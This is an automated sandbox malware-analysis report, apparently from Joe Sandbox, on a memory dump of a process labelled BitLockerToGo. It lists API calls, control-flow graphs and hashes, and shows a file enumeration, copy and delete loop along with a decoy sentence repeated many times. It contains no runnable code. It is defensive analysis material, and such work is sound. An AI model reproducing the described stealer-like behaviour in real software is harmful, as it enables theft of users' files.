                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03004723
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0300472E
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03004739
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03004744
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03004754
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0300475F
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0300476A
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03004775
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03004780
                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0300479C
                                                                                                                                                                Strings
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004765
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030045E8
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0300462D
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030045C7
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004662
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030046CD
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0300474F
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004734
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0300475A
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004657
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0300466D
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004683
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004638
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004643
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030046D8
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0300477B
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004678
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030046B7
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030045F3
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004713
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004622
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030045D2
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030046C2
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004770
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030045DD
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0300473F
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004617
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030046AC
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0300471E
                                                                                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03004729
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                                                                                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                                                                                                • API String ID: 2127927946-2218711628
                                                                                                                                                                • Opcode ID: 9d3a8e8a888485c1af6136d5368c487286da4919097254566e2ee7ab793dc606
                                                                                                                                                                • Instruction ID: b31fc57ba8df7325a5c4c6e6ee61ff40204990f654a00cfb6f568425f607485e
                                                                                                                                                                • Opcode Fuzzy Hash: 9d3a8e8a888485c1af6136d5368c487286da4919097254566e2ee7ab793dc606
                                                                                                                                                                • Instruction Fuzzy Hash: 3241CC71643214EFC71EEFE4EC8DA5DBF70AB49716B508040FA229D145CAB8D581DB3A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F,?,030161C4,?), ref: 03007724
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,030161C4), ref: 0300772B
                                                                                                                                                                • lstrcat.KERNEL32(?,03551AE8), ref: 030078DB
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 030078EF
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007903
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007917
                                                                                                                                                                • lstrcat.KERNEL32(?,03556288), ref: 0300792B
                                                                                                                                                                • lstrcat.KERNEL32(?,03556030), ref: 0300793F
                                                                                                                                                                • lstrcat.KERNEL32(?,03556048), ref: 03007952
                                                                                                                                                                • lstrcat.KERNEL32(?,035562A0), ref: 03007966
                                                                                                                                                                • lstrcat.KERNEL32(?,035563D8), ref: 0300797A
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0300798E
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 030079A2
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 030079B6
                                                                                                                                                                • lstrcat.KERNEL32(?,03556288), ref: 030079C9
                                                                                                                                                                • lstrcat.KERNEL32(?,03556030), ref: 030079DD
                                                                                                                                                                • lstrcat.KERNEL32(?,03556048), ref: 030079F1
                                                                                                                                                                • lstrcat.KERNEL32(?,035562A0), ref: 03007A04
                                                                                                                                                                • lstrcat.KERNEL32(?,03556440), ref: 03007A18
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007A2C
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007A40
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007A54
                                                                                                                                                                • lstrcat.KERNEL32(?,03556288), ref: 03007A68
                                                                                                                                                                • lstrcat.KERNEL32(?,03556030), ref: 03007A7B
                                                                                                                                                                • lstrcat.KERNEL32(?,03556048), ref: 03007A8F
                                                                                                                                                                • lstrcat.KERNEL32(?,035562A0), ref: 03007AA3
                                                                                                                                                                • lstrcat.KERNEL32(?,035564A8), ref: 03007AB6
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007ACA
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007ADE
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007AF2
                                                                                                                                                                • lstrcat.KERNEL32(?,03556288), ref: 03007B06
                                                                                                                                                                • lstrcat.KERNEL32(?,03556030), ref: 03007B1A
                                                                                                                                                                • lstrcat.KERNEL32(?,03556048), ref: 03007B2D
                                                                                                                                                                • lstrcat.KERNEL32(?,035562A0), ref: 03007B41
                                                                                                                                                                • lstrcat.KERNEL32(?,03556510), ref: 03007B55
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007B69
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007B7D
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007B91
                                                                                                                                                                • lstrcat.KERNEL32(?,03556288), ref: 03007BA4
                                                                                                                                                                • lstrcat.KERNEL32(?,03556030), ref: 03007BB8
                                                                                                                                                                • lstrcat.KERNEL32(?,03556048), ref: 03007BCC
                                                                                                                                                                • lstrcat.KERNEL32(?,035562A0), ref: 03007BDF
                                                                                                                                                                • lstrcat.KERNEL32(?,03556578), ref: 03007BF3
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007C07
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007C1B
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03007C2F
                                                                                                                                                                • lstrcat.KERNEL32(?,03556288), ref: 03007C43
                                                                                                                                                                • lstrcat.KERNEL32(?,03556030), ref: 03007C56
                                                                                                                                                                • lstrcat.KERNEL32(?,03556048), ref: 03007C6A
                                                                                                                                                                • lstrcat.KERNEL32(?,035562A0), ref: 03007C7E
                                                                                                                                                                  • Part of subcall function 030075D0: lstrcat.KERNEL32(35851020,030217FC), ref: 03007606
                                                                                                                                                                  • Part of subcall function 030075D0: lstrcat.KERNEL32(35851020,00000000), ref: 03007648
                                                                                                                                                                  • Part of subcall function 030075D0: lstrcat.KERNEL32(35851020, : ), ref: 0300765A
                                                                                                                                                                  • Part of subcall function 030075D0: lstrcat.KERNEL32(35851020,00000000), ref: 0300768F
                                                                                                                                                                  • Part of subcall function 030075D0: lstrcat.KERNEL32(35851020,03021804), ref: 030076A0
                                                                                                                                                                  • Part of subcall function 030075D0: lstrcat.KERNEL32(35851020,00000000), ref: 030076D3
                                                                                                                                                                  • Part of subcall function 030075D0: lstrcat.KERNEL32(35851020,03021808), ref: 030076ED
                                                                                                                                                                  • Part of subcall function 030075D0: task.LIBCPMTD ref: 030076FB
                                                                                                                                                                • lstrcat.KERNEL32(?,03554CD0), ref: 03007E0B
                                                                                                                                                                • lstrcat.KERNEL32(?,035557F0), ref: 03007E1E
                                                                                                                                                                • lstrlen.KERNEL32(35851020), ref: 03007E2B
                                                                                                                                                                • lstrlen.KERNEL32(35851020), ref: 03007E3B
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 928082926-0
                                                                                                                                                                • Opcode ID: 44970ceb30f5714f718d3f530e25b4803907da851984fa2a823a70fd7642367f
                                                                                                                                                                • Instruction ID: 2fb8d40ff232ab7fc69ee8198340c15a1edbacbead3fa4d6ba5f2c81588c929a
                                                                                                                                                                • Opcode Fuzzy Hash: 44970ceb30f5714f718d3f530e25b4803907da851984fa2a823a70fd7642367f
                                                                                                                                                                • Instruction Fuzzy Hash: D732F1BAD40314ABDB25FBA0EC88DDE737CBB44601F448A98E21D66084EB74E785CF51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1814 300be70-300bf02 call 301a740 call 301a920 call 301a9b0 call 301a8a0 call 301a800 * 2 call 301a740 * 2 call 301aad0 FindFirstFileA 1833 300bf41-300bf55 StrCmpCA 1814->1833 1834 300bf04-300bf3c call 301a800 * 6 call 3001550 1814->1834 1835 300bf57-300bf6b StrCmpCA 1833->1835 1836 300bf6d 1833->1836 1878 300c80f-300c812 1834->1878 1835->1836 1840 300bf72-300bfeb call 301a820 call 301a920 call 301a9b0 * 2 call 301a8a0 call 301a800 * 3 1835->1840 1838 300c7b4-300c7c7 FindNextFileA 1836->1838 1838->1833 1843 300c7cd-300c7da FindClose call 301a800 1838->1843 1884 300bff1-300c077 call 301a9b0 * 4 call 301a8a0 call 301a800 * 4 1840->1884 1885 300c07c-300c0fd call 301a9b0 * 4 call 301a8a0 call 301a800 * 4 1840->1885 1849 300c7df-300c80a call 301a800 * 5 call 3001550 1843->1849 1849->1878 1921 300c102-300c118 call 301aad0 StrCmpCA 1884->1921 1885->1921 1924 300c11e-300c132 StrCmpCA 1921->1924 1925 300c2df-300c2f5 StrCmpCA 1921->1925 1924->1925 1928 300c138-300c252 call 301a740 call 3018b60 call 301a9b0 call 301a920 call 301a8a0 call 301a800 * 3 call 301aad0 * 2 CopyFileA call 301a740 call 301a9b0 * 2 call 301a8a0 call 301a800 * 2 call 301a7a0 call 30099c0 1924->1928 1926 300c2f7-300c33a call 3001590 call 301a7a0 * 3 call 300a260 1925->1926 1927 300c34a-300c360 StrCmpCA 1925->1927 1992 300c33f-300c345 1926->1992 1931 300c362-300c379 call 301aad0 StrCmpCA 1927->1931 1932 300c3d5-300c3ed call 301a7a0 call 3018d90 1927->1932 2081 300c2a1-300c2da call 301aad0 DeleteFileA call 301aa40 call 301aad0 call 301a800 * 2 1928->2081 2082 300c254-300c29c call 301a7a0 call 3001590 call 3015190 call 301a800 1928->2082 1942 300c3d0 1931->1942 1943 300c37b-300c3ca call 3001590 call 301a7a0 * 3 call 300a790 1931->1943 1952 300c3f3-300c3fa 1932->1952 1953 300c4c6-300c4db StrCmpCA 1932->1953 1949 300c73a-300c743 1942->1949 1943->1942 1956 300c7a4-300c7af call 301aa40 * 2 1949->1956 1957 300c745-300c799 call 3001590 call 301a7a0 * 2 call 301a740 call 300be70 1949->1957 1959 300c469-300c4b6 call 3001590 call 301a7a0 call 301a740 call 301a7a0 call 300a790 1952->1959 1960 300c3fc-300c403 1952->1960 1965 300c4e1-300c64a call 301a740 call 301a9b0 call 301a8a0 call 301a800 call 3018b60 call 301a920 call 301a8a0 call 301a800 * 2 call 301aad0 * 2 CopyFileA call 3001590 call 301a7a0 * 3 call 300aef0 call 3001590 call 301a7a0 * 3 call 300b4f0 call 301aad0 StrCmpCA 1953->1965 1966 300c6ce-300c6e3 StrCmpCA 1953->1966 1956->1838 2029 300c79e 1957->2029 2037 300c4bb 1959->2037 1969 300c405-300c461 call 3001590 call 301a7a0 call 301a740 call 301a7a0 call 300a790 1960->1969 1970 300c467 1960->1970 2113 300c6a4-300c6bc call 301aad0 DeleteFileA call 301aa40 1965->2113 2114 300c64c-300c699 call 3001590 call 301a7a0 * 3 call 300ba80 1965->2114 1966->1949 1975 300c6e5-300c72f call 3001590 call 301a7a0 * 3 call 300b230 1966->1975 1969->1970 1977 300c4c1 1970->1977 2040 300c734 1975->2040 1977->1949 1992->1949 2029->1956 2037->1977 2040->1949 2081->1925 2082->2081 2121 300c6c1-300c6cc call 301a800 2113->2121 2130 300c69e 2114->2130 2121->1949 2130->2113
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,03020B32,03020B2B,00000000,?,?,?,030213F4,03020B2A), ref: 0300BEF5
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030213F8), ref: 0300BF4D
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030213FC), ref: 0300BF63
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0300C7BF
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 0300C7D1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
